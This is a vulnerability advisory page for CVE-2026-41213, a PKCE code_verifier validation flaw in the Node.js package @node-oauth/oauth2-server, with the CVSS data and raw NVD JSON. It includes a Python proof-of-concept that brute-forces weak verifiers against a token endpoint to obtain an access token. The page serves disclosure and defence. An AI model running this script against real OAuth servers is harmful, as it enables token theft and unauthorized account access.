Security Vulnerability Report
中文
CVE-2026-41213 CVSS 5.9 MEDIUM

CVE-2026-41213

Published: 2026-04-23 19:17:29
Last Modified: 2026-04-25 02:16:02
Source: [email protected]

Description

@node-oauth/oauth2-server is a module for implementing an OAuth2 server in Node.js. The token exchange path accepts RFC7636-invalid code_verifier values (including one-character strings) for S256 PKCE flows. Because short/weak verifiers are accepted and failed verifier attempts do not consume the authorization code, an attacker who intercepts an authorization code can brute-force code_verifier guesses online until token issuance succeeds.

CVSS Details

CVSS Score
5.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

未在提供信息中明确列出

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def brute_force_pkce(target_url, auth_code, client_id, redirect_uri): # Since the vulnerability accepts short verifiers, we try a list of weak candidates. # In a real scenario, this list could be expanded or sequential. weak_verifiers = ['a', '1', '123', 'test', 'code', 'admin', 'xyz'] for verifier in weak_verifiers: payload = { 'grant_type': 'authorization_code', 'code': auth_code, 'code_verifier': verifier, 'redirect_uri': redirect_uri, 'client_id': client_id } try: response = requests.post(target_url, data=payload) if response.status_code == 200: json_resp = response.json() if 'access_token' in json_resp: return f"[+] Success! Verifier: {verifier}, Token: {json_resp['access_token']}" except Exception as e: print(f"Error: {e}") return "[-] Failed to brute force the code verifier." # Example usage # target = "https://example.com/oauth/token" # code = "intercepted_authorization_code" # print(brute_force_pkce(target, code, "public_client", "https://example.com/callback"))

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-41213", "sourceIdentifier": "[email protected]", "published": "2026-04-23T19:17:29.400", "lastModified": "2026-04-25T02:16:02.250", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "@node-oauth/oauth2-server is a module for implementing an OAuth2 server in Node.js. The token exchange path accepts RFC7636-invalid code_verifier values (including one-character strings) for S256 PKCE flows. Because short/weak verifiers are accepted and failed verifier attempts do not consume the authorization code, an attacker who intercepts an authorization code can brute-force code_verifier guesses online until token issuance succeeds."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-307"}, {"lang": "en", "value": "CWE-1289"}]}], "references": [{"url": "https://github.com/node-oauth/node-oauth2-server/security/advisories/GHSA-jhm7-29pj-4xvf", "source": "[email protected]"}, {"url": "https://github.com/node-oauth/node-oauth2-server/security/advisories/GHSA-jhm7-29pj-4xvf", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.